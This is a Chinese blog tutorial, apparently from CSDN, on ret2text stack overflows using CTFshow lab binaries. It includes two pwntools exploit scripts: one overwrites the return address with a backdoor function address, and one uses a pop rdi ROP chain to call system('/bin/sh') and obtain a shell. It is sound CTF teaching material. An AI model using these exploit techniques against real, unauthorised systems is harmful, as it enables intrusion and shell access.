栈溢出——ret2text(一)

已于 2025-05-09 14:36:43 修改
阅读量1.1k 收藏 20
点赞数 25
CC 4.0 BY-SA版权
文章标签: chrome 网络安全 安全 c++ 汇编 系统安全
于 2025-05-07 09:06:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/147752679

目录

1. 漏洞原理

2.1. ret2text

2.1.1. 32位程序案例

2.1.2. 64位程序案例

3. 引用参考

1. 漏洞原理

        栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示(维基百科)。两种操作都操作栈顶,当然,它也有栈底。

高级语言在运行时都会被转换为汇编程序,在汇编程序运行过程中,充分利用了这一数据结构。每个程序在运行时都有虚拟地址空间,其中某一部分就是该程序对应的栈,用于保存函数调用信息和局部变量。此外,常见的操作也是压栈与出栈。需要注意的是,程序的栈是从进程地址空间的高地址向低地址增长的

大家可以看看我写的函数调用栈的相关文章,帮助大家理解。

需要注意的是,32 位和 64 位程序有以下简单的区别:

  • x86    
    • 函数参数函数返回地址的上方。
  • x64
    • System V AMD64 ABI (Linux、FreeBSD、macOS 等采用) 中前六个整型或指针参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9 寄存器中,如果还有更多的参数的话才会保存在栈上。
    • 内存地址不能大于 0x00007FFFFFFFFFFF,6 个字节长度,否则会抛出异常。

2.1. ret2text

2.1.1. 32位程序案例

        该漏洞类型为篡改栈帧上的返回地址为程序中已有的函数。我有一篇很早的文章,大家可以看看:栈溢出修改返回地址,得到隐藏代码的方法_栈溢出隐藏call-CSDN博客。为了帮助大家理解。这里也选择不同的调试类型为大家讲解。

这里我用ctfshow的一个靶场作为相关例子,下载相关附件后,放置在我们的虚拟机并挂载至10001端口

查看相关保护:checksec ret2text

可以看到,此程序为32位系统,没有canary保护,也就是说我们溢出时,不需要注意在栈上的保护,可以随意进行溢出。这里我们利用ida分析一下源代码。

可以看到main函数的运行结构,首先是调用logo函数,然后再调用ctfshow函数。

我们进入ctfshow函数,看看是什么。

首先声明了一个名为 buf 的大小为14字节的字符数组,它距离ebp的距离为0x12,这里通过read函数

buf能读入0x32字节 ,转换为10进制就是50个字节的数据,因此这里很明显就存在栈溢出了。这里可以判断存在栈溢出漏洞了。

紧接着我们又在左边的函数图里,看到了一个backdoor函数,这个函数存在bash代码,调用这个函数即可获取相关系统权限。

这里我们就开始构造相关poc了,我们使用python文件来进行演示。

from pwn import *  #引用相关库
io = remote('192.168.79.131',10001) #设置远程地址
backdoor = 0x08048521 #后门函数的地址
payload = b"A"*(0x12 + 4) + p32(backdoor)
#payload = cyclic(0x12+4) + p32(backdoor)
#偏移地址,这里距离ebp的距离为12,+4是覆盖ebp的值,P32(backdoor)是后门函数的地址,让其小端序存储
io.sendline(payload) #发送相关恶意代码
io.interactive()

运行后,可以看到,已经获取了相关权限

2.1.2. 64位程序案例

        对于 64 位汇编,当参数少于等于 6 个时,参数从左到右依次放入寄存器:rdi、rsi、rdx、rcx、r8、r9。当参数为 7 个以上时,前 6 个参数仍然按照上述规则放入寄存器,但是第 7 个及以后的参数从右向左依次放入栈中。也就是说要先把六个寄存器放满了才会考虑放入栈。

        有时候,程序里面既没有现成的 system 函数,也没有 /bin/sh 字符串,也没有提供 libc.so 给我们,那么我们要做的就是想办法泄露 libc 地址,拿到 system 函数和 /bin/sh 字符串,我们就需要获取 rdi, rsi, rdx, rcx, r8, r9 它们的地址,首先要获取的是 rdi 的地址。

from pwn import *
context.log_level = 'debug'
#io = process('./pwn')
io = remote('192.168.79.128',10001)
#elf = ELF('C:\\Users\\27389\\Downloads\\pwn')
#system = elf.sym['system']
system = 0x400520
bin_sh = 0x400808
pop_rdi = 0x4007e3 # 0x00000000004007e3 : pop rdi ; ret
ret = 0x4004fe
payload = b'a'*(0xA+8) + p64(pop_rdi) + p64(bin_sh) + p64(ret) + p64(system)
io.sendline(payload)
io.recv()
io.interactive()

服务端远程开启,将程序挂载至10001端口。

攻击机运行poc文件,获取服务权限。

3. 引用参考

栈介绍 - CTF Wiki

https://xz.aliyun.com/news/12744

CTFshow-PWN-栈溢出(pwn40)_ctfshow pwn40-CSDN博客

https://zhuanlan.zhihu.com/p/611961995

关于ubuntu18版本以上调用64位程序中的system函数的栈对齐问题 - ZikH26 - 博客园

ret2text
m0_49959202的博客
09-18 314
文章目录ret2text1.检查保护机制2.ida分析程序3.exp编写 ret2text 进程存在危险函数如system(“/bin”)或execv(“/bin/sh”,0,0)的片段,可以直接劫持返回地址到目标函数地址上,从而获取shell。 1.检查保护机制 首先调用checksec,检查保护机制: 发现pie没有开启 2.ida分析程序 使用ida打开程序ret2text,静态分析: 发现main函数中存在函数:vulnerable(),里面有危险函数gets(),可以用来进行栈溢出 发现
跟着CTF-wiki学pwn——ret2text
qq_42882717的博客
06-21 1372
肾么叫做万死不辞呀,就是每天被气死万次,也不辞职…(哭哭
【ctf】ret2text
woodwhale的博客
04-17 6164
PWN ret2text 题目链接:ret2text 参考博客:CTF Wiki 基本 ROP 参考视频:【CTF】Linux PWN入门 Bamboofox社课系列 0x01 下载ret2text文件,复制到 翔哥的van美pwn机 中 查看保护机制 Arch: i386-32-little //文件为32位程序 RELRO: Partial RELRO Stack: No canary found //未开启canary保护 NX: NX enabled
Hello-CTF项目中的ROP技术详解
最新发布
gitblog_00651的博客
06-26 298
Hello-CTF项目中的ROP技术详解 前言 在二进制安全领域,ROP(Return-Oriented Programming)种强大的技术,它允许研究者在特定情况下执行特定代码。本文将深入浅出地讲解ROP技术的原理和实现方式,帮助初学者理解这重要的二进制技术。 ROP技术基础 什么是ROP ROP(面向返回编程)种高级的技术,它通过精心布置栈上的返回地址,将程序中已有的代码片段(称为...
堆栈认知——栈溢出实例(ret2text)_栈溢出以后他就能跳转到你指定的地
2401_83817971的博客
04-06 924
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2textret2shellcode
qq_41040989的博客
03-31 959
将返回地址覆盖为程序.text段中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag。程序会把栈的地址输出,然后我们接收程序输出的栈地址,然后向栈中输入shellcode,通过栈溢出跳到输入shellcode的位置,最终获取shell。获取到系统权限之后,就可以输入相应的linux命令,般用到。
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 1004
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets
CTF——PWN——栈溢出(1.woof)
qq_45215609的博客
09-10 621
CTF——PWN——栈溢出(1.woof)
栈溢出基础0x01 ret2text
砖家
10-01 820
ret2text
[二进制安全学习]ret2text
Y4tacker的博客
07-12 1434
文章目录写在前面前置小知识bss段data段text段heapstackret2text参考链接 写在前面 已经学了小段时间二进制了,以后慢慢确定个深入的方向吧,开冲 前置小知识 bss段 bss段(bss segment)通常是指用来存放程序中未初始化的全局变量的块内存区域。 bss是英文Block Started by Symbol的简称。 bss段属于静态内存分配。 比如 int a; data段 数据段(data segment)通常是指用来存放程序中已初始化的全局变量的块内存区域。 数据
pwn ret2text
young‘s blog
02-06 1556
好久没有写博客了,今天记录下做ctf-wiki上ret2text的过程,也记录下学到的东西,点积累成长。 地址:ctf-wiki 源程序也在里面 边看视频边学的,视频地址为: ret2text 程序下载好之后通过checksec查看保护措施: 没有开启canary,32位动态链接程序 知道程序的基本信息后运行下程序,看看程序都有什么功能。 测试后得知只有个输入点。 拖进ida分析下...
浅谈 ret2text
akdelt的博客
01-21 1648
而此时栈顶指针指向 ‘/bin/sh’ 的地址,于是 ‘/bin/sh’ 被放入 rdi 中,然后执行 ret,此时后门函数地址顶上来了,于是就 ret 到了 func 的地址 (这就是为什么找的是pop rdi;我瞎猜的,不然不好解释)而拿去参数也是同过 EBP 偏移量来实现的,本来有返回地址时通过 [EBP+8] 来拿参数,但是因为没有返回地址 此时 EBP 和 参数相邻相差 4 个字节,所以 EBP + 8 就不是参数的地址了。前六个参数依次存放于rdi,rsi,rdx,rcx,r8,r9中。
ROP初探之ret2text
chlet的博客
05-05 703
ROP即返回导向编程是种计算机安全利用技术,它允许攻击者在存在诸如可执行空间保护和代码签名等安全防御的情况下执行代码。在这种技术中,攻击者通过控制调用栈来劫持程序控制流,并执行机器内存中已存在的精心选择的机器指令序列,称为“gadgets”。每个gadgets通常以返回指令结束,并位于现有程序和/或共享库代码中的子程序内。这些gadgets串联在起,允许攻击者在使用阻止更简单攻击的防御的机器上执行任意操作。
pwn自学笔记(1)--——ret2text
CDU__mint__的博客
10-05 2065
此篇文章是对ret2text的学习初步总结。目标利用栈溢出执行危险程序获取shell。
基本ROP之ret2text
至臻求学,胸怀云月
01-12 1439
(IDA分析存在错误,抠了天终于在大佬的帮助下抠出来了) 背景 当程序开启NX保护之后,直接向栈或堆上注入代码的方式难以发挥效果(数据页不执行操作) 提出绕过操作: ROP(Return Oriented Programming) 主要思想是:在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets),来改变寄存器或者变量的值,从而控制程序的执行流程。 所谓 gadgets 就是以 ret...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值